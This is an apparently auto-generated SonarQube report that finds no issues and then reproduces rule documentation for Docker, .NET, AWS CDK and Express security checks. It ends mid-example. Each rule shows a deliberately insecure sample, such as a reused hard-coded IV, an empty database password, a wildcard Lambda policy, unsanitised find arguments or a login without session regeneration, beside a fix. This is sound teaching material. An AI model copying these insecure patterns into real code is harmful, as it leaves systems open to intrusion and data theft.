SonarQube Vulnerability Report

Report Generated On: Thursday, Sep 21, 2023
Project Name/URL: Sonar Report
Application: sonar-report
Release: 1.0.0
Branch: master
Delta Analysis: No

Summary of the Detected Vulnerabilities

Severity   Number of Issues
HIGH       0
MEDIUM     0
LOW        0

Known Security Rules

Rule Description
vbnet:S3884

This rule is deprecated, and will eventually be removed.

Why is this an issue?

CoSetProxyBlanket and CoInitializeSecurity both work to set the permissions context in which the process invoked immediately after is executed. Calling them from within that process is useless because it’s too late at that point; the permissions context has already been set.

Specifically, these methods are meant to be called from non-managed code such as a C++ wrapper that then invokes the managed, i.e. C# or VB.NET, code.

Noncompliant code example

Imports System.Runtime.InteropServices

Public Class Noncompliant

    <DllImport("ole32.dll")>
    Public Shared Function CoSetProxyBlanket(<MarshalAs(UnmanagedType.IUnknown)> pProxy As Object, dwAuthnSvc As UInt32, dwAuthzSvc As UInt32, <MarshalAs(UnmanagedType.LPWStr)> pServerPrincName As String, dwAuthnLevel As UInt32, dwImpLevel As UInt32, pAuthInfo As IntPtr, dwCapabilities As UInt32) As Integer
    End Function

    Public Enum RpcAuthnLevel
        [Default] = 0
        None = 1
        Connect = 2
        [Call] = 3
        Pkt = 4
        PktIntegrity = 5
        PktPrivacy = 6
    End Enum

    Public Enum RpcImpLevel
        [Default] = 0
        Anonymous = 1
        Identify = 2
        Impersonate = 3
        [Delegate] = 4
    End Enum

    Public Enum EoAuthnCap
        None = &H00
        MutualAuth = &H01
        StaticCloaking = &H20
        DynamicCloaking = &H40
        AnyAuthority = &H80
        MakeFullSIC = &H100
        [Default] = &H800
        SecureRefs = &H02
        AccessControl = &H04
        AppID = &H08
        Dynamic = &H10
        RequireFullSIC = &H200
        AutoImpersonate = &H400
        NoCustomMarshal = &H2000
        DisableAAA = &H1000
    End Enum

    <DllImport("ole32.dll")>
    Public Shared Function CoInitializeSecurity(pVoid As IntPtr, cAuthSvc As Integer, asAuthSvc As IntPtr, pReserved1 As IntPtr, level As RpcAuthnLevel, impers As RpcImpLevel, pAuthList As IntPtr, dwCapabilities As EoAuthnCap, pReserved3 As IntPtr) As Integer
    End Function

    Public Sub DoSomething()
        Dim Hres1 As Integer = CoSetProxyBlanket(Nothing, 0, 0, Nothing, 0, 0, IntPtr.Zero, 0) ' Noncompliant
        Dim Hres2 As Integer = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, RpcAuthnLevel.None, RpcImpLevel.Impersonate, IntPtr.Zero, EoAuthnCap.None, IntPtr.Zero) ' Noncompliant
    End Sub

End Class

csharpsquid:S3884

This rule is deprecated, and will eventually be removed.

Why is this an issue?

CoSetProxyBlanket and CoInitializeSecurity both work to set the permissions context in which the process invoked immediately after is executed. Calling them from within that process is useless because it’s too late at that point; the permissions context has already been set.

Specifically, these methods are meant to be called from non-managed code such as a C++ wrapper that then invokes the managed, i.e. C# or VB.NET, code.

Noncompliant code example

[DllImport("ole32.dll")]
static extern int CoSetProxyBlanket([MarshalAs(UnmanagedType.IUnknown)]object pProxy, uint dwAuthnSvc, uint dwAuthzSvc,
	[MarshalAs(UnmanagedType.LPWStr)] string pServerPrincName, uint dwAuthnLevel, uint dwImpLevel, IntPtr pAuthInfo,
	uint dwCapabilities);

public enum RpcAuthnLevel
{
	Default = 0,
	None = 1,
	Connect = 2,
	Call = 3,
	Pkt = 4,
	PktIntegrity = 5,
	PktPrivacy = 6
}

public enum RpcImpLevel
{
	Default = 0,
	Anonymous = 1,
	Identify = 2,
	Impersonate = 3,
	Delegate = 4
}

public enum EoAuthnCap
{
	None = 0x00,
	MutualAuth = 0x01,
	StaticCloaking = 0x20,
	DynamicCloaking = 0x40,
	AnyAuthority = 0x80,
	MakeFullSIC = 0x100,
	Default = 0x800,
	SecureRefs = 0x02,
	AccessControl = 0x04,
	AppID = 0x08,
	Dynamic = 0x10,
	RequireFullSIC = 0x200,
	AutoImpersonate = 0x400,
	NoCustomMarshal = 0x2000,
	DisableAAA = 0x1000
}

[DllImport("ole32.dll")]
public static extern int CoInitializeSecurity(IntPtr pVoid, int cAuthSvc, IntPtr asAuthSvc, IntPtr pReserved1,
	RpcAuthnLevel level, RpcImpLevel impers, IntPtr pAuthList, EoAuthnCap dwCapabilities, IntPtr pReserved3);

static void Main(string[] args)
{
	var hres1 = CoSetProxyBlanket(null, 0, 0, null, 0, 0, IntPtr.Zero, 0); // Noncompliant

	var hres2 = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, RpcAuthnLevel.None,
		RpcImpLevel.Impersonate, IntPtr.Zero, EoAuthnCap.None, IntPtr.Zero); // Noncompliant
}

Resources

docker:S6471

Running containers as a privileged user weakens their runtime security, allowing any user whose code runs on the container to perform administrative actions.
In Linux containers, the privileged user is usually named root. In Windows containers, the equivalent is ContainerAdministrator.

A malicious user can run code on a system either through actions that could be deemed legitimate, depending on internal business logic or operational management shells, or through outright malicious actions, for example arbitrary code execution after exploiting a service that the container hosts.

Suppose the container is not hardened to prevent using a shell, interpreter, or Linux capabilities. In this case, the malicious user can read and exfiltrate any file (including Docker volumes), open new network connections, install malicious software, or, worse, break out of the container’s isolation context by exploiting other components.

This gives attackers the opportunity to steal important infrastructure files, intellectual property, or personal data.

Depending on the infrastructure’s resilience, attackers may then extend their attack to other services, such as Kubernetes clusters or cloud providers, in order to maximize their reach.

Ask Yourself Whether

This container:

  • Serves services accessible from the Internet.
  • Does not require a privileged user to run.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

In the Dockerfile:

  • Create a new default user and use it with the USER statement.
    • Some container maintainers create a specific user to be used without explicitly setting it as default, such as postgresql or zookeeper. It is recommended to use these users instead of root.
    • On Windows containers, the ContainerUser is available for this purpose.

Or, at launch time:

  • Use the user argument when calling Docker or in the docker-compose file.
  • Add fine-grained Linux capabilities to perform specific actions that require root privileges.

If this image is already explicitly set to launch with a non-privileged user, you can add it to the safe images list rule property of your SonarQube instance, without the tag.

Sensitive Code Example

For any image that does not provide a user by default, regardless of the underlying operating system:

# Sensitive
FROM alpine

ENTRYPOINT ["id"]

For multi-stage builds, the last stage is non-compliant if it does not contain the USER instruction with a non-root user:

FROM alpine AS builder
COPY Makefile ./src /
RUN make build
USER nonroot

# Sensitive, previous user settings are dropped
FROM alpine AS runtime
COPY --from=builder bin/production /app
ENTRYPOINT ["/app/production"]

Compliant Solution

For Linux-based images:

FROM alpine

RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot

USER nonroot

ENTRYPOINT ["id"]

For Windows-based images, you can use ContainerUser or create a new user:

FROM mcr.microsoft.com/windows/servercore:ltsc2019

RUN net user /add nonroot

USER nonroot

If the scratch Dockerfile untars a Linux distribution, the "Linux image" solution should be applied. Otherwise, you can either use a pre-written /etc/passwd file (regardless of the host operating system) or use a multi-stage build.

FROM scratch

COPY etc_passwd /etc/passwd
# contains "nonroot:x:1337:1337:nonroot:/nonroot:/usr/sbin/nologin"

USER nonroot

COPY production_binary /app

ENTRYPOINT ["/app/production_binary"]

or you can use a multi-stage build:

FROM alpine:latest as security_provider
RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot

FROM scratch as production
COPY --from=security_provider /etc/passwd /etc/passwd
USER nonroot
COPY production_binary /app
ENTRYPOINT ["/app/production_binary"]

For multi-stage builds:

FROM alpine as builder
COPY Makefile ./src /
RUN make build

FROM alpine as runtime
RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot
COPY --from=builder bin/production /app
USER nonroot
ENTRYPOINT ["/app/production"]

roslyn.sonaranalyzer.security.cs:S6350

Constructing arguments of system commands from user input is security-sensitive and has led to vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

using System.Diagnostics;
Process p = new Process();
p.StartInfo.FileName = "/usr/bin/find";
p.StartInfo.ArgumentList.Add(input); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

using System.Diagnostics;
Process p = new Process();
p.StartInfo.FileName = "/usr/bin/find";
if (allowed.Contains(input)) {
  p.StartInfo.ArgumentList.Add(input);
}

vbnet:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In Cipher Block Chaining (CBC) mode, each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold: beyond the direct damage, data breaches and exposure of encrypted data undermine trust in the organization, as customers, clients, and stakeholders may lose confidence in its ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

Imports System.IO
Imports System.Security.Cryptography

Public Sub Encrypt(key As Byte(), dataToEncrypt As Byte(), target As MemoryStream)
    Dim aes = New AesCryptoServiceProvider()

    Dim iv = New Byte() {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
    Dim encryptor = aes.CreateEncryptor(key, iv) ' Noncompliant

    Dim cryptoStream = New CryptoStream(target, encryptor, CryptoStreamMode.Write)
    Dim swEncrypt = New StreamWriter(cryptoStream)

    swEncrypt.Write(dataToEncrypt)
End Sub

Compliant solution

In this example, the code uses aes.IV, which is implicitly generated by a random number generator that is considered cryptographically strong.

Imports System.IO
Imports System.Security.Cryptography

Public Sub Encrypt(key As Byte(), dataToEncrypt As Byte(), target As MemoryStream)
    Dim aes = New AesCryptoServiceProvider()

    Dim encryptor = aes.CreateEncryptor(key, aes.IV)

    Dim cryptoStream = New CryptoStream(target, encryptor, CryptoStreamMode.Write)
    Dim swEncrypt = New StreamWriter(cryptoStream)

    swEncrypt.Write(dataToEncrypt)
End Sub

How does this work?

Use unique IVs

To ensure high security, initialization vectors must meet two important criteria:

  • IVs must be unique for each encryption operation.
  • For CBC and CFB modes, a secure FIPS-compliant random number generator should be used to generate unpredictable IVs.

The IV does not need to be secret, so the IV or information sufficient to determine the IV may be transmitted along with the ciphertext.

In the previous noncompliant example, the problem is not that the IV is hard-coded; it is that the same IV is reused across multiple encryption operations.

typescript:S5876

An attacker may trick a user into using a predetermined session identifier. Consequently, this attacker can gain unauthorized access and impersonate the user’s session. This kind of attack is called session fixation, and protections against it should not be disabled.

Why is this an issue?

Session fixation attacks take advantage of the way web applications manage session identifiers. Here’s how a session fixation attack typically works:

  • When a user visits a website or logs in, a session is created for them.
  • This session is assigned a unique session identifier, stored in a cookie, in local storage, or through URL parameters.
  • In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. For example, the attacker sends the victim an email containing a link with this predetermined session identifier.
  • When the victim clicks on the link, the web application does not create a new session identifier but uses this identifier known to the attacker.
  • At this point, the attacker can hijack and impersonate the victim’s session.

What is the potential impact?

Session fixation attacks pose a significant security risk to web applications and their users. By exploiting this vulnerability, attackers can gain unauthorized access to user sessions, potentially leading to various malicious activities. Some of the most relevant scenarios are the following:

Impersonation

Once an attacker successfully fixes a session identifier, they can impersonate the victim and gain access to their account without providing valid credentials. This can result in unauthorized actions, such as modifying personal information, making unauthorized transactions, or even performing malicious activities on behalf of the victim. An attacker can also manipulate the victim into performing actions they wouldn’t normally do, such as revealing sensitive information or conducting financial transactions on the attacker’s behalf.

Data Breach

If an attacker gains access to a user’s session, they may also gain access to sensitive data associated with that session. This can include personal information, financial details, or any other confidential data that the user has access to within the application. The compromised data can be used for identity theft, financial fraud, or other malicious purposes.

Privilege Escalation

In some cases, session fixation attacks can be used to escalate privileges within a web application. By fixing a session identifier with higher privileges, an attacker can bypass access controls and gain administrative or privileged access to the application. This can lead to unauthorized modifications, data manipulation, or even complete compromise of the application and its underlying systems.

How to fix it in Passport

Code examples

Upon user authentication, it is crucial to regenerate the session identifier to prevent fixation attacks. Passport provides a mechanism to achieve this by using the req.session.regenerate() method. By calling this method after successful authentication, you can ensure that each user is assigned a new and unique session ID.

Noncompliant code example

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    // Noncompliant - no session.regenerate after login
    res.redirect('/');
  });

Compliant solution

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    let prevSession = req.session;
    req.session.regenerate((err) => {
      Object.assign(req.session, prevSession);
      res.redirect('/');
    });
  });

How does this work?

The protection works by ensuring that the session identifier, which is used to identify and track a user’s session, is changed or regenerated during the authentication process.

Here’s how session fixation protection typically works:

  1. When a user visits a website or logs in, a session is created for them. This session is assigned a unique session identifier, which is stored in a cookie or passed through URL parameters.
  2. In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. This allows the attacker to potentially gain unauthorized access to the user’s session.
  3. To protect against session fixation attacks, session fixation protection mechanisms come into play during the authentication process. When a user successfully authenticates, this mechanism generates a new session identifier for the user’s session.
  4. The old session identifier, which may have been manipulated by the attacker, is invalidated and no longer associated with the user’s session. This ensures that any attempts by the attacker to use the fixed session identifier are rendered ineffective.
  5. The user is then assigned the new session identifier, which is used for subsequent requests and session tracking. This new session identifier is typically stored in a new session cookie or passed through URL parameters.

By regenerating the session identifier upon authentication, session fixation protection helps ensure that the user’s session is tied to a new, secure identifier that the attacker cannot predict or control. This mitigates the risk of an attacker gaining unauthorized access to the user’s session and helps maintain the integrity and security of the application’s session management process.

typescript:S6317

Within IAM, identity-based policies grant permissions to users, groups, or roles, and enable specific actions to be performed on designated resources. When an identity policy inadvertently grants more privileges than intended, certain users or roles might be able to perform more actions than expected. This can lead to potential security risks, as it enables malicious users to escalate their privileges from a lower level to a higher level of access.

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an identity (a user, a group, or a role) are called identity-based policies. They give an identity the ability to perform a predefined set of actions on a list of resources.

For such policies, it is easy to define very broad permissions (for example, by using wildcard "*" permissions). This is especially true if it is not yet clear which permissions will be required for a specific workload or use case. However, it is important to limit both the permissions that are granted and the resources to which they are granted. Doing so ensures that there are no users or roles that have more permissions than they need.

If this is not done, it can potentially carry security risks in the case that an attacker gets access to one of these identities.

What is the potential impact?

AWS IAM policies that contain overly broad permissions can lead to privilege escalation by granting users more access than necessary. They may be able to perform actions beyond their intended scope.

Privilege escalation

When IAM policies are too permissive, they grant users more privileges than necessary, allowing them to perform actions that they should not be able to. This can be exploited by attackers to gain unauthorized access to sensitive resources and perform malicious activities.

For example, if an IAM policy grants a user unrestricted access to all S3 buckets in an AWS account, the user can potentially read, write, and delete any object within those buckets. If an attacker gains access to this user’s credentials, they can exploit this overly permissive policy to exfiltrate sensitive data, modify or delete critical files, or even launch further attacks within the AWS environment. This can have severe consequences, such as data breaches, service disruptions, or unauthorized access to other resources within the AWS account.

How to fix it in AWS CDK

Code examples

In this example, the IAM policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

Noncompliant code example

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["*"], // Noncompliant
    })],
});

Compliant solution

The policy is narrowed such that only updates to the code of certain Lambda functions (without high privileges) are allowed.

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["arn:aws:lambda:us-east-2:123456789012:function:my-function:1"],
    })],
});

How does this work?

Principle of least privilege

When creating IAM policies, it is important to adhere to the principle of least privilege. This means that any user or role should only be granted enough permissions to perform the tasks that they are supposed to, and nothing else.

To successfully implement this, it is easier to start from nothing and gradually build up all the needed permissions. When starting from a policy with overly broad permissions that is later made stricter, it is harder to ensure that no gaps are forgotten. In this case, it might be useful to monitor the users or roles to verify which permissions are actually used.
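
As a hedged illustration of that monitoring idea, a plain JavaScript helper (no CDK dependency; the function name is an assumption) can flag statements in an IAM policy document that allow actions on every resource:

```javascript
// Illustrative check: list ALLOW statements that apply to all resources.
// Operates on the standard IAM policy JSON shape ({ Statement: [...] }).
function overlyBroadStatements(policyDocument) {
  return policyDocument.Statement.filter(
    (s) => s.Effect === 'Allow' && [].concat(s.Resource).includes('*')
  );
}
```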

typescript:S5689

Disclosure of version information, usually overlooked by developers but disclosed by default by the systems and frameworks in use, can pose a significant security risk depending on the production environment.

Once this information is public, attackers can use it to identify potential security holes or vulnerabilities specific to that version.

Furthermore, if the published version information indicates the use of outdated or unsupported software, it becomes easier for attackers to exploit known vulnerabilities. They can search for published vulnerabilities related to that version and launch attacks that specifically target those vulnerabilities.

Ask Yourself Whether

  • Version information is accessible to end users.
  • Internal systems do not benefit from timely patch management workflows.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

In general, it is recommended to keep internal technical information within internal systems to control what attackers know about the underlying architectures. This is known as the "need to know" principle.

The most effective solution is to remove version information disclosure from what end users can see, such as the "x-powered-by" header.
This can be achieved directly through the web application code, the server (Nginx, Apache), or firewalls.

Disabling the server signature provides additional protection by reducing the amount of information available to attackers. Note, however, that this does not provide as much protection as regular updates and patches.
Security by obscurity is the weakest defense of all. It should never be the only mechanism and should always be combined with other security measures.

Sensitive Code Example

In Express.js, version information is disclosed by default in the x-powered-by HTTP header:

let express = require('express');

let example = express(); // Sensitive

example.get('/', function (req, res) {
  res.send('example')
});

Compliant Solution

The x-powered-by HTTP header should be disabled in Express.js with app.disable:

let express = require('express');

let example = express();
example.disable("x-powered-by");

Or with helmet’s hidePoweredBy middleware:

let express = require('express');
let helmet = require("helmet");

let example = express();
example.use(helmet.hidePoweredBy());

javascript:S5876

An attacker may trick a user into using a predetermined session identifier. Consequently, this attacker can gain unauthorized access and impersonate the user’s session. This kind of attack is called session fixation, and protections against it should not be disabled.

Why is this an issue?

Session fixation attacks take advantage of the way web applications manage session identifiers. Here’s how a session fixation attack typically works:

  • When a user visits a website or logs in, a session is created for them.
  • This session is assigned a unique session identifier, stored in a cookie, in local storage, or through URL parameters.
  • In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. For example, the attacker sends the victim an email containing a link with this predetermined session identifier.
  • When the victim clicks on the link, the web application does not create a new session identifier but uses this identifier known to the attacker.
  • At this point, the attacker can hijack and impersonate the victim’s session.

What is the potential impact?

Session fixation attacks pose a significant security risk to web applications and their users. By exploiting this vulnerability, attackers can gain unauthorized access to user sessions, potentially leading to various malicious activities. Some of the most relevant scenarios are the following:

Impersonation

Once an attacker successfully fixes a session identifier, they can impersonate the victim and gain access to their account without providing valid credentials. This can result in unauthorized actions, such as modifying personal information, making unauthorized transactions, or even performing malicious activities on behalf of the victim. An attacker can also manipulate the victim into performing actions they wouldn’t normally do, such as revealing sensitive information or conducting financial transactions on the attacker’s behalf.

Data Breach

If an attacker gains access to a user’s session, they may also gain access to sensitive data associated with that session. This can include personal information, financial details, or any other confidential data that the user has access to within the application. The compromised data can be used for identity theft, financial fraud, or other malicious purposes.

Privilege Escalation

In some cases, session fixation attacks can be used to escalate privileges within a web application. By fixing a session identifier with higher privileges, an attacker can bypass access controls and gain administrative or privileged access to the application. This can lead to unauthorized modifications, data manipulation, or even complete compromise of the application and its underlying systems.

How to fix it in Passport

Code examples

Upon user authentication, it is crucial to regenerate the session identifier to prevent fixation attacks. Passport provides a mechanism to achieve this by using the req.session.regenerate() method. By calling this method after successful authentication, you can ensure that each user is assigned a new and unique session ID.

Noncompliant code example

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    // Noncompliant - no session.regenerate after login
    res.redirect('/');
  });

Compliant solution

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    let prevSession = req.session;
    req.session.regenerate((err) => {
      Object.assign(req.session, prevSession);
      res.redirect('/');
    });
  });

How does this work?

The protection works by ensuring that the session identifier, which is used to identify and track a user’s session, is changed or regenerated during the authentication process.

Here’s how session fixation protection typically works:

  1. When a user visits a website or logs in, a session is created for them. This session is assigned a unique session identifier, which is stored in a cookie or passed through URL parameters.
  2. In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. This allows the attacker to potentially gain unauthorized access to the user’s session.
  3. To protect against session fixation attacks, session fixation protection mechanisms come into play during the authentication process. When a user successfully authenticates, this mechanism generates a new session identifier for the user’s session.
  4. The old session identifier, which may have been manipulated by the attacker, is invalidated and no longer associated with the user’s session. This ensures that any attempts by the attacker to use the fixed session identifier are rendered ineffective.
  5. The user is then assigned the new session identifier, which is used for subsequent requests and session tracking. This new session identifier is typically stored in a new session cookie or passed through URL parameters.

By regenerating the session identifier upon authentication, session fixation protection helps ensure that the user’s session is tied to a new, secure identifier that the attacker cannot predict or control. This mitigates the risk of an attacker gaining unauthorized access to the user’s session and helps maintain the integrity and security of the application’s session management process.

Resources

Documentation

Articles & blog posts

Standards

javascript:S6317

Within IAM, identity-based policies grant permissions to users, groups, or roles, and enable specific actions to be performed on designated resources. When an identity policy inadvertently grants more privileges than intended, certain users or roles might be able to perform more actions than expected. This can lead to potential security risks, as it enables malicious users to escalate their privileges from a lower level to a higher level of access.

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an identity (a user, a group or a role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

For such policies, it is easy to define very broad permissions (for example, by using wildcard "*" permissions). This is especially true when it is not yet clear which permissions a specific workload or use case will require. However, it is important to limit both the permissions that are granted and the resources to which they are granted. Doing so ensures that no user or role has more permissions than it needs.

Otherwise, an attacker who gains access to one of these identities inherits all of its excess permissions.

What is the potential impact?

AWS IAM policies that contain overly broad permissions can lead to privilege escalation by granting users more access than necessary. They may be able to perform actions beyond their intended scope.

Privilege escalation

When IAM policies are too permissive, they grant users more privileges than necessary, allowing them to perform actions that they should not be able to. This can be exploited by attackers to gain unauthorized access to sensitive resources and perform malicious activities.

For example, if an IAM policy grants a user unrestricted access to all S3 buckets in an AWS account, the user can potentially read, write, and delete any object within those buckets. If an attacker gains access to this user’s credentials, they can exploit this overly permissive policy to exfiltrate sensitive data, modify or delete critical files, or even launch further attacks within the AWS environment. This can have severe consequences, such as data breaches, service disruptions, or unauthorized access to other resources within the AWS account.

How to fix it in AWS CDK

Code examples

In this example, the IAM policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

Noncompliant code example

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["*"], // Noncompliant
    })],
});

Compliant solution

The policy is narrowed such that only updates to the code of certain Lambda functions (without high privileges) are allowed.

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["arn:aws:lambda:us-east-2:123456789012:function:my-function:1"],
    })],
});

How does this work?

Principle of least privilege

When creating IAM policies, it is important to adhere to the principle of least privilege. This means that any user or role should only be granted enough permissions to perform the tasks that they are supposed to, and nothing else.

To implement this successfully, it is easier to start from nothing and gradually build up the needed permissions. When starting from a policy with overly broad permissions that is tightened later, it is harder to ensure that no gaps have been forgotten. In that case, it can be useful to monitor the users or roles to verify which permissions are actually used.
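Why a wildcard resource defeats least privilege can be shown with a toy policy evaluator. This sketch is hypothetical (it is not the real IAM evaluation engine) and treats "*" as matching every ARN:

```javascript
// Toy evaluator: an Allow statement matches if the action is listed and the
// resource is either listed explicitly or covered by a "*" wildcard.
function isAllowed(policy, action, resource) {
  return policy.statements.some(s =>
    s.effect === 'Allow' &&
    s.actions.includes(action) &&
    s.resources.some(r => r === '*' || r === resource)
  );
}

const broad = { statements: [{ effect: 'Allow',
  actions: ['lambda:UpdateFunctionCode'], resources: ['*'] }] };
const narrow = { statements: [{ effect: 'Allow',
  actions: ['lambda:UpdateFunctionCode'],
  resources: ['arn:aws:lambda:us-east-2:123456789012:function:my-function:1'] }] };

// A high-privilege function the identity was never meant to touch:
const privileged = 'arn:aws:lambda:us-east-2:123456789012:function:admin-task';
console.log(isAllowed(broad, 'lambda:UpdateFunctionCode', privileged));  // true: any function can be altered
console.log(isAllowed(narrow, 'lambda:UpdateFunctionCode', privileged)); // false: only the listed function
```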

Resources

Documentation

Articles & blog posts

Standards

javascript:S5689

Disclosure of version information, often overlooked by developers but enabled by default by the systems and frameworks in use, can pose a significant security risk depending on the production environment.

Once this information is public, attackers can use it to identify potential security holes or vulnerabilities specific to that version.

Furthermore, if the published version information indicates the use of outdated or unsupported software, it becomes easier for attackers to exploit known vulnerabilities. They can search for published vulnerabilities related to that version and launch attacks that specifically target those vulnerabilities.

Ask Yourself Whether

  • Version information is accessible to end users.
  • Internal systems do not benefit from timely patch management workflows.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

In general, it is recommended to keep internal technical information within internal systems to control what attackers know about the underlying architectures. This is known as the "need to know" principle.

The most effective solution is to remove version information disclosure from what end users can see, such as the "x-powered-by" header.
This can be achieved directly through the web application code, server (nginx, apache) or firewalls.

Disabling the server signature provides additional protection by reducing the amount of information available to attackers. Note, however, that this does not provide as much protection as regular updates and patches.
Security through obscurity is the weakest defense of all. It should never be the only defense mechanism and should always be combined with other security measures.

Sensitive Code Example

In Express.js, version information is disclosed by default in the x-powered-by HTTP header:

let express = require('express');

let example = express(); // Sensitive

example.get('/', function (req, res) {
  res.send('example')
});

Compliant Solution

x-powered-by HTTP header should be disabled in Express.js with app.disable:

let express = require('express');

let example = express();
example.disable("x-powered-by");

Or with helmet’s hidePoweredBy middleware:

let helmet = require("helmet");

let example = express();
example.use(helmet.hidePoweredBy());

See

csharpsquid:S2115

When accessing a database, an empty password should be avoided as it introduces a weakness.

Why is this an issue?

When a database does not require a password for authentication, it allows anyone to access and manipulate the data stored within it. Exploiting this vulnerability typically involves identifying the target database and establishing a connection to it without the need for any authentication credentials.

What is the potential impact?

Once connected, an attacker can perform various malicious actions, such as viewing, modifying, or deleting sensitive information, potentially leading to data breaches or unauthorized access to critical systems. It is crucial to address this vulnerability promptly to ensure the security and integrity of the database and the data it contains.

Unauthorized Access to Sensitive Data

When a database lacks a password for authentication, it opens the door for unauthorized individuals to gain access to sensitive data. This can include personally identifiable information (PII), financial records, intellectual property, or any other confidential information stored in the database. Without proper access controls in place, malicious actors can exploit this vulnerability to retrieve sensitive data, potentially leading to identity theft, financial loss, or reputational damage.

Compromise of System Integrity

Without a password requirement, unauthorized individuals can gain unrestricted access to a database, potentially compromising the integrity of the entire system. Attackers can inject malicious code, alter configurations, or manipulate data within the database, leading to system malfunctions, unauthorized system access, or even complete system compromise. This can disrupt business operations, cause financial losses, and expose the organization to further security risks.

Unwanted Modifications or Deletions

The absence of a password for database access allows anyone to make modifications or deletions to the data stored within it. This poses a significant risk, as unauthorized changes can lead to data corruption, loss of critical information, or the introduction of malicious content. For example, an attacker could modify financial records, tamper with customer orders, or delete important files, causing severe disruptions to business processes and potentially leading to financial and legal consequences.

Overall, the lack of a password configured to access a database poses a serious security risk, enabling unauthorized access, data breaches, system compromise, and unwanted modifications or deletions. It is essential to address this vulnerability promptly to safeguard sensitive data, maintain system integrity, and protect the organization from potential harm.

How to fix it in Entity Framework Core

Code examples

The following code uses an empty password to connect to a SQL Server database.

The vulnerability can be fixed by using Windows authentication (sometimes referred to as integrated security).

Noncompliant code example

protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
{
  optionsBuilder.UseSqlServer("Server=myServerAddress;Database=myDataBase;User Id=myUsername;Password="); // Noncompliant
}

Compliant solution

protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
{
  optionsBuilder.UseSqlServer("Server=myServerAddress;Database=myDataBase;Integrated Security=True");
